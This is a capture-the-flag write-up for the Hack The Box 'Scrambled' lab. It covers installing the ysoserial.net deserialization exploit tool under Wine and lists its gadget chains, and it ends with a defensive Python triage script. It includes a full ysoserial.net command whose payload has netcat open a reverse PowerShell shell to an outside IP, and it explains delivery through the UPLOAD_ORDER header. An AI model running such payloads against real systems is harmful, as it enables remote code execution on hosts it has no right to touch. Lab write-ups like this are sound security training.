ysoserial.net


ysoserial.net is a collection of utilities and property-oriented programming “gadget chains” discovered in common .NET libraries that can, under the right conditions, exploit .NET applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.

This project is inspired by Chris Frohoff’s ysoserial project.

The main options of ysoserial.net are: --gadget (-g), --formatter (-f), --output (-o) and --plugin (-p).

  • --gadget (-g), used to indicate the gadget to abuse (the class/function that will be abused during deserialization to execute commands).
  • --formatter (-f), used to indicate the method used to serialize the exploit (you need to know which library the back-end uses to deserialize the payload and use the same one to serialize it).
  • --output (-o), used to indicate whether you want the exploit raw or base64 encoded. Note that ysoserial.net will encode the payload using UTF-16LE (the default encoding on Windows), so if you take the raw output and just encode it from a Linux console you might run into encoding compatibility problems that prevent the exploit from working properly (in the HTB JSON box the payload worked in both UTF-16LE and ASCII, but this doesn’t mean it will always work).
  • --plugin (-p), ysoserial.net supports plugins to craft exploits for specific frameworks, such as ViewState.

Installation


The tool is designed for a Windows environment.

However, it can be made to work in a Linux environment with a bit more effort. This method uses the .NET 4.8 framework via Wine as the runtime, providing the components ysoserial.net needs.

┌──(kali㉿kali)-[~/Tools]
└─$ sudo apt reinstall mono-complete wine winetricks -y

While I already have all those packages installed on my system, I will reinstall them for the sake of replication.

┌──(kali㉿kali)-[~/Tools/ysoserial.net]
└─$ wget -q https://github.com/pwntester/ysoserial.net/releases/download/v1.36/ysoserial-1dba9c4416ba6e79b6b262b758fa75e2ee9008e9.zip ; unzip ysoserial-1dba9c4416ba6e79b6b262b758fa75e2ee9008e9.zip

I will then download the binary package of ysoserial.net.

┌──(kali㉿kali)-[~/Tools/ysoserial.net]
└─$ winetricks dotnet48
------------------------------------------------------
warning: You are using a 64-bit WINEPREFIX. Note that many verbs only install 32-bit versions of packages. If you encounter problems, please retest in a clean 32-bit WINEPREFIX before reporting a bug.
------------------------------------------------------
------------------------------------------------------
WINEPREFIX INFO:
Drive C: total 28
drwxr-xr-x  7 kali kali 4096 Dec 21  2022 .
drwxr-xr-x  4 kali kali 4096 Oct 25 23:57 ..
drwxr-xr-x  3 kali kali 4096 Sep  9  2022 ProgramData
drwxr-xr-x  6 kali kali 4096 Sep  9  2022 Program Files
drwxr-xr-x  7 kali kali 4096 Dec 21  2022 Program Files (x86)
drwxr-xr-x  4 kali kali 4096 Sep  9  2022 users
drwxr-xr-x 22 kali kali 4096 Oct 25 23:43 windows
 
Registry info:
/home/kali/.wine/system.reg:#arch=win64
/home/kali/.wine/user.reg:#arch=win64
/home/kali/.wine/userdef.reg:#arch=win64
------------------------------------------------------
------------------------------------------------------
warning: wine cmd.exe /c echo '%AppData%' returned empty string, error message "wine: could not load kernel32.dll, status c0000135" 
------------------------------------------------------

The initial dotnet48 installation failed. This is because my older installation was made with a 64-bit WINEPREFIX, and some verbs in winetricks install only 32-bit versions of packages, which may cause issues with installing dotnet48. Furthermore, an error loading the kernel32.dll file was encountered, complicating the installation process.

┌──(kali㉿kali)-[~/Tools/ysoserial.net]
└─$ mv ~/.wine ~/.wine.old

As a temporary workaround, I will rename the existing Wine directory so that the installation can take place.

┌──(kali㉿kali)-[~/Tools/ysoserial.net]
└─$ winetricks dotnet48

Installing

It went through a lot of installations with many warnings and errors, likely due to conflicts with the older installation. Nonetheless, the installation is complete.

┌──(kali㉿kali)-[~/Tools/ysoserial.net]
└─$ alias ysoserial.net='/usr/bin/wine /home/kali/Tools/ysoserial.net/ysoserial.exe'

I will set an alias for ease of use.

┌──(kali㉿kali)-[~/Tools/ysoserial.net]
└─$ ysoserial.net                                                                        
Missing arguments. You may need to provide the command parameter even if it is being ignored.
ysoserial.net generates deserialization payloads for a variety of .NET formatters.
 
== GADGETS ==
        (*) ActivitySurrogateDisableTypeCheck [Disables 4.8+ type protections for ActivitySurrogateSelector, command is ignored] (supports extra options: use the '--fullhelp' argument to view)
                Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*) ActivitySurrogateSelector [This gadget ignores the command parameter and executes the constructor of ExploitClass class] (supports extra options: use the '--fullhelp' argument to view)
                Formatters: BinaryFormatter (2) , LosFormatter , SoapFormatter
        (*) ActivitySurrogateSelectorFromFile [Another variant of the ActivitySurrogateSelector gadget. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'] (supports extra options: use the '--fullhelp' argument to view)
                Formatters: BinaryFormatter (2) , LosFormatter , SoapFormatter
        (*) AxHostState
                Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*) BaseActivationFactory [Gadget for .NET 5/6/7 with WPF enabled or Microsoft.WindowsDesktop.App\PresentationFramework.dll available. Leads to remote DLL loading (native C/C++ DLL)]
                Formatters: Json.Net
        (*) ClaimsIdentity
                Formatters: BinaryFormatter , LosFormatter , SoapFormatter
        (*) ClaimsPrincipal
                Formatters: BinaryFormatter , LosFormatter , SoapFormatter
        (*) DataSet
                Formatters: BinaryFormatter , LosFormatter , SoapFormatter
        (*) DataSetOldBehaviour [This gadget targets and old behaviour of DataSet which uses XML format] (supports extra options: use the '--fullhelp' argument to view)
                Formatters: BinaryFormatter , LosFormatter
        (*) DataSetOldBehaviourFromFile [Another variant of the DataSetOldBehaviour gadget. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'] (supports extra options: use the '--fullhelp' argument to view)
                Formatters: BinaryFormatter , LosFormatter
        (*) DataSetTypeSpoof [A more advanced type spoofing which can use any arbitrary types can be seen in TestingArenaHome::SpoofByBinaryFormatterJson or in the DataSetOldBehaviour gadget]
                Formatters: BinaryFormatter , LosFormatter , SoapFormatter
        (*) GenericPrincipal (supports extra options: use the '--fullhelp' argument to view)
                Formatters: BinaryFormatter , LosFormatter
        (*) GetterCompilerResults [Remote DLL loading gadget for .NET 5/6/7 with WPF enabled (mixed DLL). Local DLL loading for .NET Framework if System.CodeDom is available. DLL path delivered with -c argument] (supports extra options: use the '--fullhelp' argument to view)
                Formatters: Json.Net
        (*) GetterSecurityException (supports extra options: use the '--fullhelp' argument to view)
                Formatters: Json.Net
        (*) GetterSettingsPropertyValue (supports extra options: use the '--fullhelp' argument to view)
                Formatters: Json.Net , MessagePackTypeless , MessagePackTypelessLz4 , Xaml
        (*) ObjectDataProvider (supports extra options: use the '--fullhelp' argument to view)
                Formatters: DataContractSerializer (2) , FastJson , FsPickler , JavaScriptSerializer , Json.Net , MessagePackTypeless , MessagePackTypelessLz4 , SharpSerializerBinary , SharpSerializerXml , Xaml (4) , XmlSerializer (2) , YamlDotNet < 5.0.0
        (*) ObjRef
                Formatters: BinaryFormatter , LosFormatter , ObjectStateFormatter , SoapFormatter
        (*) PSObject [Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017)]
                Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*) RolePrincipal
                Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*) SessionSecurityToken
                Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*) SessionViewStateHistoryItem
                Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*) TextFormattingRunProperties [This normally generates the shortest payload] (supports extra options: use the '--fullhelp' argument to view)
                Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*) ToolboxItemContainer
                Formatters: BinaryFormatter , LosFormatter , SoapFormatter
        (*) TypeConfuseDelegate
                Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer
        (*) TypeConfuseDelegateMono [Tweaked TypeConfuseDelegate gadget to work with Mono]
                Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer
        (*) WindowsClaimsIdentity [Requires Microsoft.IdentityModel.Claims namespace (not default GAC)] (supports extra options: use the '--fullhelp' argument to view)
                Formatters: BinaryFormatter (3) , DataContractSerializer (2) , Json.Net (2) , LosFormatter (3) , NetDataContractSerializer (3) , SoapFormatter (2)
        (*) WindowsIdentity
                Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*) WindowsPrincipal
                Formatters: BinaryFormatter , DataContractJsonSerializer , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*) XamlAssemblyLoadFromFile [Loads assembly using XAML. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'] (supports extra options: use the '--fullhelp' argument to view)
                Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*) XamlImageInfo [Gadget leads to XAML deserialization. Variant 1 (GAC) reads XAML from file (local path or UNC path can be given). Variant 2 (non-GAC) delivers XAML directly, but requires Microsoft.Web.Deployment.dll] (supports extra options: use the '--fullhelp' argument to view)
                Formatters: Json.Net
 
== PLUGINS ==
        (*) ActivatorUrl (Sends a generated payload to an activated, presumably remote, object)
        (*) Altserialization (Generates payload for HttpStaticObjectsCollection or SessionStateItemCollection)
        (*) ApplicationTrust (Generates XML payload for the ApplicationTrust class)
        (*) Clipboard (Generates payload for DataObject and copy it into the clipboard - ready to be pasted in affected apps)
        (*) DotNetNuke (Generates payload for DotNetNuke CVE-2017-9822)
        (*) GetterCallGadgets (Implements arbitrary getter call gadgets for .NET Framework and .NET 5/6/7 with WPF enabled, run with -l for more help)
        (*) NetNonRceGadgets (Implements Non-RCE gadgets for .NET Framework)
        (*) Resx (Generates RESX and .RESOURCES files)
        (*) SessionSecurityTokenHandler (Generates XML payload for the SessionSecurityTokenHandler class)
        (*) SharePoint (Generates payloads for the following SharePoint CVEs: CVE-2020-1147, CVE-2019-0604, CVE-2018-8421)
        (*) ThirdPartyGadgets (Implements gadgets for 3rd Party Libraries)
        (*) TransactionManagerReenlist (Generates payload for the TransactionManager.Reenlist method)
        (*) ViewState (Generates a ViewState using known MachineKey parameters)
 
Note: Machine authentication code (MAC) key modifier is not being used for LosFormatter in ysoserial.net. Therefore, LosFormatter (base64 encoded) can be used to create ObjectStateFormatter payloads.
 
Usage: ysoserial.exe [options]
Options:
  -p, --plugin=VALUE         The plugin to be used.
  -o, --output=VALUE         The output format (raw|base64|raw-
                               urlencode|base64-urlencode|hex). Default: raw
  -g, --gadget=VALUE         The gadget chain.
  -f, --formatter=VALUE      The formatter.
  -c, --command=VALUE        The command to be executed.
      --rawcmd               Command will be executed as is without `cmd /c `
                               being appended (anything after first space is an
                               argument).
  -s, --stdin                The command to be executed will be read from
                               standard input.
      --bgc, --bridgedgadgetchains=VALUE
                             Chain of bridged gadgets separated by comma (,).
                               Each gadget will be used to complete the next
                               bridge gadget. The last one will be used in the
                               requested gadget. This will be ignored when
                               using the searchformatter argument.
  -t, --test                 Whether to run payload locally. Default: false
      --outputpath=VALUE     The output file path. It will be ignored if
                               empty.
      --minify               Whether to minify the payloads where applicable.
                               Default: false
      --ust, --usesimpletype This is to remove additional info only when
                               minifying and FormatterAssemblyStyle=Simple
                               (always `true` with `--minify` for binary
                               formatters). Default: true
      --raf, --runallformatters
                             Whether to run all the gadgets with the provided
                               formatter (ignores gadget name, output format,
                               and the test flag arguments). This will search
                               in formatters and also show the displayed
                               payload length. Default: false
      --sf, --searchformatter=VALUE
                             Search in all formatters to show relevant
                               gadgets and their formatters (other parameters
                               will be ignored).
      --debugmode            Enable debugging to show exception errors and
                               output length
  -h, --help                 Shows this message and exit.
      --fullhelp             Shows this message + extra options for gadgets
                               and plugins and exit.
      --credit               Shows the credit/history of gadgets and plugins
                               (other parameters will be ignored).
      --runmytest            Runs that `Start` method of `TestingArenaHome` -
                               useful for testing and debugging.

It runs, although not perfectly. Some gadgets don’t seem to work due to missing dependencies.

Payload


┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ ysoserial.net -f binaryformatter -g typeconfusedelegate -o base64 --minify -c 'c:\\Temp\\nc64.exe 10.10.16.8 1234 -e powershell' > payload.txt

I will be using the TypeConfuseDelegate gadget, targeting the BinaryFormatter format. Upon successful exploitation, the payload will create a reverse shell connection to Kali using the existing Netcat binary that I placed earlier.

Header String


Finally, prepending the header string is the last CRUCIAL step, because UPLOAD_ORDER is the specific header under which the client sends serialized objects. Any other header, such as LIST_ORDER, SUCCES, or QUIT, won’t work, as the server-side program interprets and handles those messages differently (it won’t deserialize the payload for execution).
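As an added example (not part of this writeup or of ysoserial.net), here is a defender-side triage script that applies two points made on this page: only UPLOAD_ORDER messages reach the deserializer, and ysoserial.net writes text-based payloads as UTF-16LE rather than UTF-8, so a detector that only looks for UTF-8 strings misses them. It identifies the formatter family of a captured message's payload and flags type names that command-execution chains carry. The `HEADER;<base64>` wire format, the marker list and the sample messages are constructed assumptions.

```python
import base64
import re

# Every BinaryFormatter stream opens with a SerializationHeaderRecord:
# record type 0x00, RootId=1, HeaderId=-1, MajorVersion=1, MinorVersion=0.
BINARYFORMATTER_MAGIC = bytes.fromhex("0001000000ffffffff0100000000000000")
# Type names command-execution chains carry as strings; checked in UTF-8 and UTF-16LE.
SUSPECT_MARKERS = (b"System.Diagnostics.Process", b"cmd /c", b"powershell")
# Assumed wire format "HEADER;<base64>": the ';' separator is a constructed
# assumption; the text only states that UPLOAD_ORDER is the deserializing header.
MESSAGE_RE = re.compile(r"^(?P<header>[A-Z_]+);(?P<body>[A-Za-z0-9+/=]*)\s*$")

def looks_utf16le(raw: bytes) -> bool:
    """UTF-16LE text starts with a BOM or an ASCII byte followed by NUL."""
    return raw.startswith(b"\xff\xfe") or (len(raw) > 1 and raw[0] != 0 and raw[1] == 0)

def classify_blob(raw: bytes) -> dict:
    """Name the formatter family of a decoded payload and flag RCE markers."""
    if raw.startswith(BINARYFORMATTER_MAGIC):
        kind, encoding = "BinaryFormatter", "binary"
    else:
        encoding = "utf-16-le" if looks_utf16le(raw) else "utf-8"
        text = raw.decode(encoding, errors="replace").lstrip("\ufeff").lstrip()
        if text.startswith("<SOAP-ENV:"):
            kind = "SoapFormatter"
        elif '"$type"' in text:
            kind = "Json.Net"
        else:
            kind = "xml" if text.startswith("<") else "unknown"
    hit = any(m in raw or m.decode().encode("utf-16-le") in raw for m in SUSPECT_MARKERS)
    return {"kind": kind, "encoding": encoding, "suspicious": hit}

def triage_message(line: str) -> dict:
    """Decide whether one captured client message would reach the deserializer."""
    m = MESSAGE_RE.match(line)
    if not m or m.group("header") != "UPLOAD_ORDER":   # LIST_ORDER, SUCCES, QUIT ...
        return {"header": m.group("header") if m else None, "reaches_deserializer": False}
    try:
        raw = base64.b64decode(m.group("body"), validate=True)
    except ValueError:
        return {"header": "UPLOAD_ORDER", "reaches_deserializer": False, "error": "bad base64"}
    return {"header": "UPLOAD_ORDER", "reaches_deserializer": True, **classify_blob(raw)}

# Constructed samples (no real gadget chain): a BinaryFormatter header followed by a
# marker string record, and a SOAP fragment in UTF-16LE as ysoserial.net would emit it.
SAMPLE_BINARY = BINARYFORMATTER_MAGIC + b"\x06\x01\x00\x00\x00\x1aSystem.Diagnostics.Process"
SAMPLE_SOAP = "<SOAP-ENV:Envelope><a1:Order/></SOAP-ENV:Envelope>".encode("utf-16-le")
SAMPLE_MESSAGES = ["LIST_ORDER;", "UPLOAD_ORDER;" + base64.b64encode(SAMPLE_BINARY).decode(),
                   "UPLOAD_ORDER;" + base64.b64encode(SAMPLE_SOAP).decode()]
```

Running `triage_message` over the samples shows the LIST_ORDER message never reaching the deserializer, the binary sample classified as BinaryFormatter and flagged, and the SOAP sample recognised only because it is decoded as UTF-16LE.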